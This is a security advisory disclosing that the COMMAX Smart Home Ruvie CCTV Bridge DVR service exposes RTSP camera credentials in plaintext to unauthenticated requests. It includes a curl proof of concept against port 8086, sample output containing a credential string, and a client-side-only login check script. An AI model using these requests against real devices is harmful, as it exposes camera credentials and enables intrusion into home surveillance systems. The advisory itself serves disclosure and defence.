COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credential Disclosure

2021.08.17
Credit: LiquidWorm
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: n/a Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety. Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text. Tested on: GoAhead-Webs Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5665 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php 02.08.2021 -- $ curl http://TARGET:8086/overview.asp <HTML> <HEAD> <TITLE> Infomation</TITLE> <script src="./jquery.min.js"></script> <script src="./jquery.cookie.js"></script> <script src="./login_check.js"></script> </HEAD> <BODY> <br><br> <center> <table> <tr><td> <li> [2021/08/15 09:56:46] Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@$$w0rd@10.0.0.17:554/Streaming/Channels/2:554 <BR> </td></tr> </table> </center> </BODY> </HTML> $ curl http://TARGET:8086/login_check.js: var server_ip = $(location).attr('host'); var server_domain = server_ip.replace(":8086", ""); document.domain = server_domain; var cookiesAuth = $.cookie("cookiesAuth"); if (cookiesAuth != "authok") { parent.document.location.href = "http://" + server_domain + ":8086/home.asp"; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top